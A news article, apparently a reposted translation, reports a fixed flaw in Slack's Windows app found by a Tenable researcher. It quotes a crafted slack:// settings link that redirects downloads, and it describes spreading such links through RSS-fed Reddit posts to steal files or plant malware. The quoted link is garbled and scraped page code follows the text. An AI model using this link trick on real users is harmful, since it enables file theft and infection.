Slack fixes a bug in the Windows app that could have been used for spying


A security researcher discovered a flaw in Slack that could have been exploited to steal files through the professional email app and potentially spread malware.

The flaw concerns Slack’s Windows desktop app and how it can automatically send downloaded files to a certain destination, whether it’s your PC or an online storage server. You can set a download location in the preferences section of the app. However, David Wells, a researcher at security firm Tenable, noticed that there is another way to configure the option: through a special link.

“Create a link like ‘slack: // settings /? Update = {‘ PrefSSBFileDownloadPath ‘:[pathHere]’}’ would change the default download location if clicked, “Wells wrote in a blog post about the vulnerability.

Wells realized that the same function could be abused. Imagine a hacker using the links to secretly reconfigure a Slack desktop app to send all uploaded files to an external server. “Using this attack vector, an insider could exploit this vulnerability for corporate espionage, manipulation or to access documents outside of their purview,” said Tenable, the security firm of Well, in a separate report.

The vulnerability can also pave the way for possible malware infections. All downloaded files sent to the Hack Controller server can be modified and tricked to include malicious code. The attack will start once the victim opens the file on the Slack desktop app.

The main obstacle to carrying out this attack is the circulation of links created by hackers to people on Slack, which keeps its channels private for paying customers and their businesses. To achieve this, Wells noticed how Slack channels can be configured to subscribe to RSS feeds, including discussion threads on Reddit.

“I could post an article to a very popular Reddit community that Slack users around the world subscribe to,” Wells said. The link created by a hacker will then fill up inside the Slack channel and eventually attract a few clicks.

Recommended by our editors

“This technique might be unmasked by savvy Slack users, but if decades of phishing campaigns have taught us anything, it’s that users click on links, and when they are exploited via an unreliable RSS feed. , the impact can become much more interesting, ”he added.

Slack fixed the flaw in version 3.4.0 of the Windows desktop app. “We have investigated and found no indication that this vulnerability has ever been used, nor any report that our users have been affected,” the company said in an email.

What's New Now to get our top stories delivered to your inbox every morning.","first_published_at":"2021-09-30T21:30:40.000000Z","published_at":"2021-09-30T21:30:40.000000Z","last_published_at":"2021-09-30T21:30:34.000000Z","created_at":null,"updated_at":"2021-09-30T21:30:40.000000Z"})" x-show="showEmailSignUp()" class="rounded bg-gray-lightest text-center md:px-32 md:py-8 p-4 font-brand mt-8 container-xs">
Get our best stories!

Sign up for What’s up now to get our best stories delivered to your inbox every morning.

This newsletter may contain advertising, offers or affiliate links. Signing up for a newsletter indicates your consent to our terms of use and privacy policy. You can unsubscribe from newsletters at any time.

Source link


About Author

Leave A Reply